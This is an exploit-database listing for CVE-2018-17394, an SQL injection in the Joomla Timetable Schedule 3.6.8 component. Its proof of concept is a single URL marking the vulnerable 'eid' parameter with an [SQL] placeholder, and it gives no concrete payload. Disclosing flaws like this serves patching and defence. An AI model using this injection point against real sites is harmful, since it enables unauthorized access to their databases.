[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Joomla Timetable Schedule 3.6.8 Component - SQL Injection Vulnerability

Author
Ihsan Sencan
Risk
[
Security Risk High
]
0day-ID
0day-ID-31189
Category
web applications
Date add
26-09-2018
CVE
CVE-2018-17394
Platform
php
# # # # #
# Exploit Title: Joomla! Component Timetable Schedule 3.6.8 - SQL Injection
# Vendor Homepage: http://osthemeclub.com/
# Software Link: https://extensions.joomla.org/extensions/extension/calendars-a-events/timetable-schedule/
# Version: 3.6.8
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-17394
# # # # #
# Exploit Author: Ihsan Sencan
# # # # #
# 
# POC: 
# 
# 1)
# http://localhost/[PATH]/index.php?option=com_timetableschedule&view=schedule&Itemid=492&eid=[SQL]
# 
# # # #

#  0day.today [2024-11-15]  #